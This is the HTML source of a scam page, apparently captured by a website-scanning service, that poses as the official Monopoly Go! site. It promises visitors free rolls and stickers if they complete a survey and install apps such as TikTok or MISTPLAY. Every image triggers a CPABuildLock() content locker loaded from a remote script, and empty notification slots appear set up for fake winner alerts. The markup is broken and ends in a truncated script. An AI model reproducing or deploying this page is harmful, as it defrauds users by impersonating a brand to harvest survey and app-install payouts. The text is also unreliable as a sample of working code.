<html>
<head>
<title>Monopoly Go! Official Website</title>
<meta name="description" content="Monopoly Go! Official Website"/>
<meta property="og:title" content="Monopoly Go!"/>
<meta property="og:description" content="Monopoly Go! Official Website"/>
<meta property="og:image" content="https://imgur.com/AsGGIs5.png"/>
<meta name="referrer" content="no-referrer">
<style>
.header_blue {
background: #1565c0;
padding: 80px 0 20px;
color: #fff;
font-size: 48px;
font-weight: 300;
margin-bottom: 40px;
}
.header_text {
margin-left: auto;
margin-right: auto;
width: 80%;
}
body{
margin:0;
background-color: #000000;
font-family:Roboto, sans-serif;
color:#FFF;
}
.unlockBtn:hover{
box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
}
.unlockBtn {
background: #2196f3;
border: none;
border-radius: 2px;
box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
min-height: 31px;
min-width: 70px;
padding: 2px 16px;
text-align: center;
text-shadow: none;
text-transform: uppercase;
-webkit-transition: all 280ms ease;
transition: all 280ms ease;
box-sizing: border-box;
cursor: pointer;
-webkit-appearance: none;
display: inline-block;
vertical-align: middle;
font: 500 14px/31px Roboto,sans-serif!important;
outline: 0!important;
color:white;
}
.content-container{
width:80%;margin:0 auto;
}
@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
#navbar-iframe {
height:0px;
visibility:hidden;
display:none
}
</style>
</head>
<body><script type="text/javascript">
function setAttributeOnload(object, attribute, val) {
if(window.addEventListener) {
window.addEventListener('load',
function(){ object[attribute] = val; }, false);
} else {
window.attachEvent('onload', function(){ object[attribute] = val; });
}
}
</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Monopoly Go! Official Website</title>
<style>
body {
font-family: Arial, Helvetica, sans-serif;
background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHk_7kfCwVpEF9yhsDTgFv9eYOa60KgrhePz6iY0M-CgufRO1UlPgOtldpKFoLdZ58CEo18_YiOKgFj0pQEoyoIDdy3C3uZDatZXCVLweuEmrQ99brAoP06le5wOshRKVp8vnIZAIDOWzs4ZKfZFj2koDtspGR3sX4mvWLLHKPhVtajwWf6m1eOPnDhwzX/s1399/20240508_012118.jpg);
background-position: center center;
background-repeat: no-repeat;
background-size: cover;
padding: 0%;
margin: 0%;
box-sizing: border-box;
}
.navbar {
background-color: #ffffff50;
padding: 15px;
box-shadow: 0 0 5px #00172f;
text-align: center;
display: block;
}
.navbar-text {
font-weight: bolder;
color: #FFF;
font-size: 15px;
}
.main-content {
scroll-behavior: smooth;
display: block;
background-color: #00000050;
box-shadow: 0 0 5px #00172f;
margin: 10px;
padding: 5px;
border-radius: 5px;
}
footer {
text-align: center;
background-color: #ffffff50;
box-shadow: 0 0 5px #00172f;
padding: 10px;
cursor: pointer;
}
.box-card {
display: inline-table;
background-color: #00000050;
border-radius: 10px;
box-shadow: 0 0 10px #ffffff;
margin: 10px;
height: 10px;
width: 10px;
text-align: center;
}
.box-card:hover {
border: solid 2px green;
}
a {
text-decoration: none;
color: #00172f;
font-weight: bolder;
}
#overlay {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: #00172f;
filter: alpha(opacity=50);
-moz-opacity: 0.5;
-khtml-opacity: 0.5;
opacity: 0.5;
z-index: 100;
display: none;
}
.popup-menu a {
text-decoration: none;
color: #ffffff;
background: #00bbff;
padding-right: 20px;
padding-left: 20px;
padding-top: 5px;
padding-bottom: 5px;
border-radius: 5px;
box-shadow: 0 0 10px #8a8a8a;
}
.popup-menu a:hover {
background: #55d2ff;
color: #00172f;
}
.popup {
width: 100%;
margin: 10 auto;
display: flex;
position: fixed;
z-index: 101;
text-align: center;
}
.popup-menu {
min-width: auto;
width: 300px;
margin: 100px auto;
background: #f3f3f3;
position: relative;
z-index: 100;
padding: 10px 35px;
border-radius: 10px;
background: linear-gradient(145deg, #e6e6e6, #ffffff);
box-shadow: 5px 5px 10px #666666,
-5px -5px 10px #ffffff;
}
h1 {
cursor: pointer;
font-size: 20px;
font-weight: bolder;
font-family: Arial;
}
h2 {
cursor: pointer;
font-size: 15px;
font-family: Arial;
color: #777777;
}
h3 {
cursor: pointer;
font-size: 19px;
margin: 10px;
text-align: center;
font-weight: bolder;
}
.header {
position: fixed;
width: 100%;
padding: 5px;
border-radius: 0px;
background: linear-gradient(145deg, #e6e6e6, #ffffff);
box-shadow: 5px 5px 10px #666666,
-5px -5px 10px #ffffff;
}
.header-text {
font-size: 25px;
text-align: center;
font-weight: bolder;
}
.btn-url {
padding: 10px;
margin: 10px;
border-radius: 5px;
background: #ffffff;
box-shadow: 5px 5px 10px #666666,
-5px -5px 10px #ffffff;
text-decoration: none;
cursor: pointer;
width: 260px;
text-align: center;
font-weight: bolder;
}
.btn-url:hover {
border-radius: 10px;
background: #ffffff;
box-shadow: inset 5px 5px 10px #666666,
inset -5px -5px 10px #ffffff;
}
.checkmark:hover {
background-color: #ccc;
border-style: solid;
border-width:2px;
border-color: #077d07;
-ms-transform: scale(1.02);
-webkit-transform: scale(1.02);
transform: scale(1.02);
}
.checkmarkSelected {
background-color: #ccc;
border-style: solid;
border-width:2px;
border-color: #077d07;
-ms-transform: scale(1.02);
-webkit-transform: scale(1.02);
transform: scale(1.02);
}
.containerPlat input {
position: absolute;
opacity: 0;
cursor: pointer;
}
button {
padding: 1px 15px 8px 15px;
margin: 5px;
border-style: solid;
border-width: 0px;
border-color: #7c7c7c;
border-radius: 10%;
background-color: #000000;
color: #ffffff;
font-size: 10px;
font-weight: bold;
cursor: pointer;
}
button:disabled,
button[disabled]{
border: 1px solid #999999;
background-color: #cccccc;
color: #666666;
}
video {
width: 100%;
height: auto;
}
.gambar {
margin: 1px;
transition: transform .5s;
top: 0;
left: 0;
height: 110px;
width: 110px;
background-color: #f2f2f2;
border-radius: 5%;
position: relative;
}
.box-card2 {
display: inline-table;
background-color: #00000050;
border-radius: 10px;
box-shadow: 0 0 10px #ffffff;
margin: 10px;
height: 10px;
width: 10px;
text-align: center;
border: solid 2px #c6ffc6;
}
.responsive1 {
width: 100%;
max-width: 180px;
height: auto;
border-radius: 10px;
padding: 1px;
margin: 1px auto;
}
.responsive2 {
width: 100%;
max-width: 1263px;
height: auto;
border-radius: 10px;
padding: 1px;
margin: 1px auto;
}
a {
text-decoration: none;
color: #ffffff;
font-weight: bolder;
}
</style>
</head>
<body>
<div class="navbar">
<div class="navbar-text">Monopoly Go! Official Website</div>
</div><center>
<div class="container container-custom-1">
<div class="container-banner-home">
<div class="container-title-banner-home">
<div class="text-banner-home-container">
</div>
<div class="button-container-home">
</div>
</div>
</div>
</div>
<div class="slide-nav">
<div class="prev"></div>
<div class="next"></div>
</div>
<div class="slide-buttons"></div>
<div class="main-content">
<center>
<body>
<div class="container">
<div class="gmr-luhur">
<div class='widget-flex'>
<h3 class='title' style="color:#484848;"></h3>
<div class="navbar-text"></div>
<center><a onclick="CPABuildLock();">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMxqKP8lYqU2c3zoMKNtcb7shlpg8usiXueJKQ7jB4eVEuNnaZJmu8DZth8lvsyHIX5yW7Nf0N8qHDMK9FNIhVmwSQPvgxe7DmQ7QA-kSVaEUncUjb_A-6XKkXFFAVasiVokz6R5_mKrxRSEc6f1Mg9TrJOJyDOhx6l1ghBv6oB55n6a0gq_kUpPHTa-4/s1280/_20240619_023516.JPG" width="1263" height="738" class="responsive2"></center>
<div class="judul" style="padding: 10px;">
Congratulations you are one of the winners out of 100 randomly selected people...d<br>
>s<² Get Free 15.000 Rolls and 5 STAR Sticker Monopoly Go <²>s<br>
1. Click the button below "COLLECT NOW".<br>
2. Please complete the survey, install the TIKTOK App, MONEY CASH, TESTER BUDDY or MISTPLAY App then complete the Register<br>
3. After the steps above are completed you will immediately receive Free 15.000 Rolls and 5 STAR Sticker Monopoly Go. Good Luck.<br>
<center><a onclick="CPABuildLock();"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoLjFuvZlteqosmhMMQahc1w9m10WHCPBk0HO800ACRdxickpUNGcH_-8n0LIqRp_8lugyr0gWLtwsvXnrrpOuHJ4YxYH0uWOo1GJfvS6vdHc8muItEKym3wLoeU7xgINCLoX7JJyc03ZzwE1HZzGYBV63N_fOoEhlWnzDNQ2vVT86ACWTB2JBIVSx4o/s921/download%20(13).png" class="responsive1"><br><br></a></center>
<script type="text/javascript">
var LaLnJ_kDL_dTGImc={"it":4355274,"key":"a2f33"};
</script>
<script src="https://d1mikxzr3lp4va.cloudfront.net/02c9f72.js"></script>
<div>
<tablle>
<tr>
<td>
<div> <div class="fot-style">
<center>
<a onclick="CPABuildLock();"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnTU3f0vNmO7lK2WanBoiS8Mo3j8WfZyyjVJnW0p6Q9Tr7HmOpRMvW9hbDNMR2zX3b5yZqrZHH_jM1aKFFJwwyJoKkX3DsFHdZB6pemURzYy12iXYomFZIRMJQF8yv6xpUfiVsKC-XOQYwQun1zNsHYRI42Pmt8VAz1iViNc2WVbr6srdvyxPgK5PgPo8/s1280/1711672475448_adobe_express.png" width="1263" height="738" class="responsive2"></a></center>
<center>
</center>
<center>
<a onclick="CPABuildLock();"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1bZJZqUVcgorf_Sym0nSOCrkJA6dtW6F-G8Cs6ASJAsRK3fo-gjVbsK-8AFS6iFqtLtff7ub1mxktXGAMORl5Mv2cz_ADGpCx9Ps-iRGDm2OUYqbGVfQWQB3Uw_4yF1EXDleZ7io9Sk3-U2XLcTqpspowSd56hTv_xc38vRhcY8kKyBoDVqlKFs_ECP8/s1440/_20240603_145341.JPG" width="1263" height="738" class="responsive2"></a></center>
<div id="notification-container" class="notification-bottom-left">
<div class="notification notification-success" aria-live="polite" style="display: block;">
<div class="notification-title" id="customer-name"></div>
<div class="notification-message" id="customer-phone"></div>
<div class="notification-message" id="customer-time">
</div>
</div>
</div>
<script type='text/javascript'>
$(function() {
var overlay = $('<div id="overlay"></div>');
overlay.show();
overlay.appendTo(document.body);
$('.popup').show();
$('.X').click(function() {
$('.popup').hide();
overlay.appendTo(document.body).remove();
return false;
});
$('.x').click(function() {
$('.popup').hide();
overlay.appendTo(document.body).remove();
return false;
});
});</body></html>
<script type="text/javascript">
var message="55
© 2023 Quttera Ltd. All rights reserved.